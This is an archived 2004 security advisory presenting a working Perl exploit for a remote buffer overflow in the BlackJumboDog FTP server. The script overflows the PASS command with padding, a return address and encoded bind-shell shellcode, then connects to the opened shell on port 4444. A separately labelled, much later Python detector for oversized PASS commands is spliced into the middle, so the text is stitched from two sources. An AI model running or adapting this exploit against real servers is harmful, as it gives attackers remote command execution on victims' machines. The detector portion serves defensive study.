[EXPL] BlackJumboDog Remote Buffer Overflow Exploit Code

From: SecuriTeam (support_at_securiteam.com)
Date: 08/04/04

    To: list@securiteam.com
    Date: 4 Aug 2004 23:20:43 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      BlackJumboDog Remote Buffer Overflow Exploit Code
    ------------------------------------------------------------------------

    SUMMARY

    A remote buffer overflow was found and reported in our previously featured
    article 'BlackJumboDog FTP Server Buffer Overflow'
    (http://www.securiteam.com/windowsntfocus/5AP040ADPW.html).

    The following proof-of-concept script can help test the vulnerability
    against potentially vulnerable servers.

    DETAILS

    Exploit:

    #!/usr/bin/perl
    #
    # BlackJumboDog exploit code by Tal Zeltzer
    #

    use strict;
    use IO::Socket::INET;

    usage() unless(@ARGV == 2);

    my $host = shift(@ARGV);
    my $port = shift(@ARGV);

    # win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
    my $shellcode =
    "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85".
    "\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19".
    "\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05".
    "\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0".
    "\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74".
    "\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15".
    "\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14".
    "\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53".
    "\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce".
    "\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf".
    "\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb".
    "\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18".
    "\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6".
    "\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16".
    "\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f".
    "\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c".
    "\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18".
    "\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f".
    "\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8".
    "\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e".
    "\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f".
    "\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27".
    "\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2".
    "\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a".
    "\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

    my $socket =
    IO::Socket::INET->new(proto=>'tcp',PeerAddr=>$host,PeerPort=>$port);
    $socket or die "Cannot connect to host!\n";

    print "[+] Connected to host\r\n";

    $socket->autoflush(1);

    #receive banner

    my $repcode = "220 ";
    my $response = recv_reply($socket,$repcode);

    #send USER command

    my $username = "anonymous";
    print $socket "USER $username\r\n";

    $repcode = "";

    select(undef, undef, undef, 1.002); # sleep for about 1 second

    #Send PASS Command ( Evil Buffer )
    # EIP At 308
    # 7C4E2F60 - jmp ebx On kernel32.dll ( Windows 2000 SP4 )

    printf "[+] Sending shellcode\r\n";

    my $buf = "A"x308;
    $buf = $buf . "\xEB\x06\xEB\x06"; # Jump 6 bytes forward
    $buf = $buf . "\x60\x2F\x4E\x7C";
    $buf = $buf . $shellcode;
    print $socket "PASS $buf\r\n";

    select(undef, undef, undef, 1.002); # sleep for about 1 second

    $repcode = "";
    recv_reply($socket, $repcode);

    close($socket);

    system("telnet $host 4444");

    exit(0);

    sub usage
    {
        # print usage information
        print "\nUsage: jumbo.pl <host> <port>\n" .
              "<host> - The host to connect to\n" .
              "<port> - The TCP port\n\n";
        exit(1);
    }

    sub recv_reply
    {
        # read reply lines until the expected reply code is seen; an empty
        # $repcode reads until the server closes the connection (an empty
        # Perl pattern would otherwise silently reuse the last match)
        my $socket  = shift;
        my $repcode = shift;
        $socket or die "Can't receive on socket\n";

        my $res = "";
        while (<$socket>)
        {
            $res .= $_;
            last if length($repcode) && /\Q$repcode\E/;
        }
        return $res;
    }
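As an added defensive counterpart to the listing above (this is not part of the advisory or its author's code), the following Python detector flags FTP PASS commands on the control channel whose argument is far longer than any real password or contains non-printable bytes. The 128-byte cap and the sample capture are constructed assumptions, chosen against the advisory's 308 bytes of padding.

```python
"""Detector for overflow-shaped FTP PASS commands on the control channel."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Assumption: no legitimate password approaches this length; the advisory's
# payload needs 308 bytes of padding before the overwritten pointer.
MAX_PASS_LEN = 128


@dataclass
class Finding:
    reason: str
    length: int


def check_ftp_line(raw: bytes) -> Optional[Finding]:
    """Return a Finding if a PASS line looks like an overflow attempt, else None."""
    line = raw.rstrip(b"\r\n")
    cmd, _, arg = line.partition(b" ")
    if cmd.upper() != b"PASS":
        return None
    # Overflow payloads are far longer than any real password.
    if len(arg) > MAX_PASS_LEN:
        return Finding("oversized PASS argument", len(arg))
    # Return addresses and shellcode contain bytes no typed password would.
    if any(b < 0x20 or b > 0x7E for b in arg):
        return Finding("non-printable bytes in PASS argument", len(arg))
    return None


def scan_lines(lines: List[bytes]) -> List[Tuple[int, Finding]]:
    """Run the check over captured lines; returns (line number, finding) pairs."""
    hits = []
    for n, line in enumerate(lines, 1):
        f = check_ftp_line(line)
        if f is not None:
            hits.append((n, f))
    return hits


# Constructed sample capture: a normal login, then a PASS command shaped like
# the advisory's (308 bytes of padding plus a few opaque bytes, not the payload).
SAMPLE = [
    b"USER anonymous\r\n",
    b"PASS guest@example.org\r\n",
    b"USER anonymous\r\n",
    b"PASS " + b"A" * 308 + b"\xeb\x06\x90\x90" + b"\r\n",
]

if __name__ == "__main__":
    for n, f in scan_lines(SAMPLE):
        print(f"line {n}: {f.reason} (len={f.length})")
```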

    ADDITIONAL INFORMATION

    The information has been provided by Tal Zeltzer of SecuriTeam Experts
    (expert@securiteam.com).


